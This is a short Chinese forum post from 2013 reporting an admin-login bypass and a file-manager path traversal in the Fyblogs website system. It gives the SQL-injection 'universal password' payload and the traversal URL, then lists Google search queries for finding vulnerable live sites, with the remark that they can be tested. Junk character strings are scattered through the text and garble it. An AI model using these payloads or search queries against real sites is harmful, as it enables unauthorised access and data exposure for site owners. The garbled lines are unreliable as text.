漏洞类型: 未授权访问/权限绕过
% S% A4 z+ {3 h" c4 I5 |; f3 }4 j6 m8 a$ b. Y
简要描述:
7 y% u: Z( N( C& g8 j- e3 a, N9 Y" Q/ b
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! I2 z% ^9 w9 d$ M, T/ N- e' Q5 d& L- \" \' j
详细说明:0 _; Y) y2 M/ R) C8 n/ i9 s- }; L5 n
6 [* ]( n1 S& ]1 B/ y* N1 T+ N3 _后台万能密码 'or'='or'
2 D, L: z- K% o+ |* D: G; @3 _后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!% u, O3 S6 S% v4 K: A# v
admin/uploadfile.asp?currentFolder=/upfiles/../3 \! d( [6 ]4 m g+ I
1 M. `, u/ m$ r
漏洞证明: S+ b8 ~& t9 I- @$ {+ }- X
9 s0 S+ z. Z$ f, f9 y
谷歌:inurl:type.asp?id=1 新闻中心9 V9 }/ B/ p: Y( g
或者 :inurl:download_ok.asp?
' F) s- }) w- u' B& n$ \, i# j( [
8 B6 q0 t) \0 [/ u可以测试
* c5 K( }4 V8 }7 O R3 u
1 t% C! v; S) c) y+ a9 I
8 \7 O% K e5 } |
发表于 2013-3-7 13:07:46
收藏
支持
反对